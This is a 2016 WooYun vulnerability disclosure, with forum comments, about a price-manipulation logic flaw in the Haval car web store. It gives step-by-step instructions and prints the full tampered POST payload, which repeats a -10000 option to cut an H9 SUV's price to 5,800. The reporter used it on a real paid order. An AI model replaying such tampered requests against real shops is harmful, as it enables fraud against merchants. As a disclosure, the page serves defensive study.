当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0200301

漏洞标题:哈弗汽车商城缺陷之我是如何5800买到哈弗H9的(原价27W)

相关厂商:gwm.com.cn

漏洞作者: 江湖闯名号

提交时间:2016-04-25 12:13

修复时间:2016-06-17 10:10

公开时间:2016-06-17 10:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-25: 细节已通知厂商并且等待厂商处理中
2016-05-03: 厂商已经确认,细节仅向厂商公开
2016-05-13: 细节向核心白帽子及相关领域专家公开
2016-05-23: 细节向普通白帽子公开
2016-06-02: 细节向实习白帽子公开
2016-06-17: 细节向公众公开

简要描述:

哈弗汽车商城缺陷之我是如何5800买到哈弗H9的(原价27W)

详细说明:

自定义汽车配置参数在post时重复写入在加入导致减少价格,因为最低需要支付5000,减少该配置是-1000所以最少要支付5800元。其他车不可以是因为没有减价项。
一、访问哈弗汽车商城里的汽车车型
http://mall.haval.com.cn/carload/spuSelector.html
二、选择哈弗H9

1.png


三、在装备项勾选“五人座”-10000

2.png


四、点击加入购物车或者是立即购买,查看数据包。

3.png


五、查看返回数据,等下要改。

4.png


六、用工具重新post数据,重复{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},着串数据27次等于减27W。重新得到七、返回的数据。

5.png


baidaJsonStr={"userJokerDetails":[{"PRODUCT_ID":10387,"BAIDA_TYPE":2,"PARAM_ID":1324,"PART_ID":359,"MATCH_PARAM_ID":295,"ADD_PRICE":0,"BAIDA_NAME":"灰黑内饰"},{"PRODUCT_ID":10387,"BAIDA_TYPE":2,"PARAM_ID":1325,"PART_ID":"387","MATCH_PARAM_ID":295,"ADD_PRICE":"0","BAIDA_NAME":"卷云银纹装饰板"},{"PRODUCT_ID":10387,"BAIDA_TYPE":1,"PARAM_ID":1323,"PART_ID":296,"MATCH_PARAM_ID":295,"ADD_PRICE":0,"BAIDA_NAME":"极地白"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"}],"PRODUCT_ID":10387,"MATCH_PARAM_ID":295,"BASE_PRICE":275800,"ADD_PRICE_ALL":-10000,"USER_JOKER_ID":"","SAVE_MODE":2}


八、在页面中找到第一次在页面上post回的数,修改为post工具中得到的数,点确认购买,或放入购物车。

6.png


九、进入购物车页面

7.png


十、点击去结账

7.png


十一、进入支付定金界面

8.png


9.png


十二、支付成功

10.png


11.png


漏洞证明:

一、访问哈弗汽车商城里的汽车车型
http://mall.haval.com.cn/carload/spuSelector.html
二、选择哈弗H9

1.png


三、在装备项勾选“五人座”-10000

2.png


四、点击加入购物车或者是立即购买,查看数据包。

3.png


五、查看返回数据,等下要改。

4.png


六、用工具重新post数据,重复{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},着串数据27次等于减27W。重新得到七、返回的数据。

5.png


baidaJsonStr={"userJokerDetails":[{"PRODUCT_ID":10387,"BAIDA_TYPE":2,"PARAM_ID":1324,"PART_ID":359,"MATCH_PARAM_ID":295,"ADD_PRICE":0,"BAIDA_NAME":"灰黑内饰"},{"PRODUCT_ID":10387,"BAIDA_TYPE":2,"PARAM_ID":1325,"PART_ID":"387","MATCH_PARAM_ID":295,"ADD_PRICE":"0","BAIDA_NAME":"卷云银纹装饰板"},{"PRODUCT_ID":10387,"BAIDA_TYPE":1,"PARAM_ID":1323,"PART_ID":296,"MATCH_PARAM_ID":295,"ADD_PRICE":0,"BAIDA_NAME":"极地白"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"}],"PRODUCT_ID":10387,"MATCH_PARAM_ID":295,"BASE_PRICE":275800,"ADD_PRICE_ALL":-10000,"USER_JOKER_ID":"","SAVE_MODE":2}


八、在页面中找到第一次在页面上post回的数,修改为post工具中得到的数,点确认购买,或放入购物车。

6.png


九、进入购物车页面

7.png


十、点击去结账

7.png


十一、进入支付定金界面

8.png


9.png


十二、支付成功

10.png


11.png

修复方案:

验证post参数,每项参数只能出现一次。另外就是这个订单我已经支付了,如果算数的话我就去提车,要是不算数请将款退回我卡里,谢谢!!!我的订单编号:20160424224109548908

版权声明:转载请注明来源 江湖闯名号@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-05-03 10:03

厂商回复:

厂家正在紧急处理。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-25 12:13 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    顶配啊

  2. 2016-04-25 12:16 | 白开水 ( 普通白帽子 | Rank:273 漏洞数:34 | 苍茫的天涯是我的爱~)

    我就问问 你提到车了吗

  3. 2016-04-25 12:25 | hecate ( 普通白帽子 | Rank:823 漏洞数:128 | ®高级安全工程师 | WooYun认证√)

    我就问问 你提到车了吗

  4. 2016-04-25 12:26 | PgHook ( 普通白帽子 | Rank:1020 漏洞数:123 | Portulaca grandiflora Hook.)

    花5800买个自行车么??

  5. 2016-04-25 12:35 | px1624 ( 普通白帽子 | Rank:1151 漏洞数:207 | px1624)

    哈佛说 车送你了~

  6. 2016-04-25 12:39 | j14n ( 普通白帽子 | Rank:2052 漏洞数:363 | weibo那个j14n不是我。)

    1分。

  7. 2016-04-25 12:46 | 江湖闯名号 ( 路人 | Rank:13 漏洞数:4 | 最近发了3个Q币商品,由于隔了几天没审核,...)

    特斯拉1块钱都送了,哈弗 5800不知道会怎么说!!!

  8. 2016-04-25 13:06 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    我就问问 你提到车了吗

  9. 2016-04-25 13:42 | 江湖闯名号 ( 路人 | Rank:13 漏洞数:4 | 最近发了3个Q币商品,由于隔了几天没审核,...)

    @齐迹 没有,客服刚给我打电话了,之后说早上看到订单了,正在排查,认为我账号被盗了,说订单金额有问题,说要改我的金额。

  10. 2016-04-25 13:44 | 江湖闯名号 ( 路人 | Rank:13 漏洞数:4 | 最近发了3个Q币商品,由于隔了几天没审核,...)

    特斯拉这样的厂商漏洞为什么挖不到,挖到个国内厂商的,好桑心!

  11. 2016-04-25 14:05 | crazykb ( 路人 | Rank:30 漏洞数:2 | The quieter you become, the more you are...)

    来一辆

  12. 2016-04-25 14:21 | 小苹果 ( 普通白帽子 | Rank:243 漏洞数:62 | 只要锄头挥的好,哪有洞挖不到)

    我就问问 你提到车了吗

  13. 2016-04-25 15:51 | 江湖闯名号 ( 路人 | Rank:13 漏洞数:4 | 最近发了3个Q币商品,由于隔了几天没审核,...)

    @小苹果 没有 各位

  14. 2016-04-25 16:31 | 诚殷的小白帽 ( 实习白帽子 | Rank:76 漏洞数:36 )

    我就问问 你提到车了吗

  15. 2016-04-27 09:27 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

    如果是特斯拉的漏洞 说不定人家就认了

  16. 2016-04-27 10:55 | 丨丶钟情 ( 路人 | Rank:6 漏洞数:2 | 我就看看 不提交漏洞)

    我就问问 你提到车了吗

  17. 2016-04-27 16:58 | 胡小树 ( 实习白帽子 | Rank:66 漏洞数:13 | 我是一颗小小树)

    5800绝逼打水漂了,恭喜洞主

  18. 2016-04-28 17:09 | 江湖闯名号 ( 路人 | Rank:13 漏洞数:4 | 最近发了3个Q币商品,由于隔了几天没审核,...)

    有点想要打水漂的感觉,给我打电话没有直接否认订单,但是也没退款给我。

  19. 2016-05-01 18:07 | Hax0rs ( 实习白帽子 | Rank:65 漏洞数:13 | Hax0rs)

    @江湖闯名号 然后厂商故意忽略,然后也不退款,然后就没了...

  20. 2016-05-03 10:11 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    涉嫌金融诈骗 报案必备抓

  21. 2016-05-03 10:35 | byr5ec ( 路人 | Rank:10 漏洞数:2 | I'm pursuing all teh time 5h37|_!)

    这种订单厂商,不退款,也没什么问题。

  22. 2016-05-03 11:31 | 随风的风 ( 普通白帽子 | Rank:257 漏洞数:95 | 微信公众号:233sec 不定期分享各种漏洞思...)

    就问 5800退款了吗? 7rank 5800换7rank。。。

  23. 2016-05-03 12:09 | 黑色的屌丝 ( 实习白帽子 | Rank:39 漏洞数:6 | →_→→_→)

    感觉好桑心

  24. 2016-05-03 12:24 | 钥匙君 ( 实习白帽子 | Rank:46 漏洞数:17 | 一个懒人)

    5800没了……

  25. 2016-05-03 12:43 | Hax0rs ( 实习白帽子 | Rank:65 漏洞数:13 | Hax0rs)

    5800买9个rank

  26. 2016-05-03 14:29 | 二维码 ( 实习白帽子 | Rank:61 漏洞数:4 | 老子跳起来就是个么么哒)

    5800买9个rank

  27. 2016-05-03 17:13 | 江湖闯名号 ( 路人 | Rank:13 漏洞数:4 | 最近发了3个Q币商品,由于隔了几天没审核,...)

    5000退了

  28. 2016-05-06 23:24 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:488 漏洞数:129 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    @江湖闯名号 另外800呢?

  29. 2016-05-31 08:43 | px1624 ( 普通白帽子 | Rank:1151 漏洞数:207 | px1624)

    5800买9个rank

  30. 2016-05-31 10:54 | un10ad ( 实习白帽子 | Rank:88 漏洞数:14 | \/\/\/)

    5800换9rank 值了